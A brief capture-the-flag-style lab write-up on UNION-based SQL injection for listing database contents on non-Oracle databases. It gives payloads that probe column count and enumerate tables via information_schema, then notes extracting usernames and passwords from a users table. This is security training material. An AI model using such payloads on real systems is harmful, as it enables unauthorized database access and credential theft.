Lab: SQL injection attack, listing the database contents on non-Oracle databases
GET the NO of columns and Data types
'+UNION+SELECT+'abc','def'--.Get All Tables
'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--Get All Columns from the users_uenqft table
Get username_audqir and password_qddmam from users_uenqft table
PreviousLab: SQL injection attack, querying the database type and version on MySQL and MicrosoftNextWireless Networks Penetration Testing
Last updated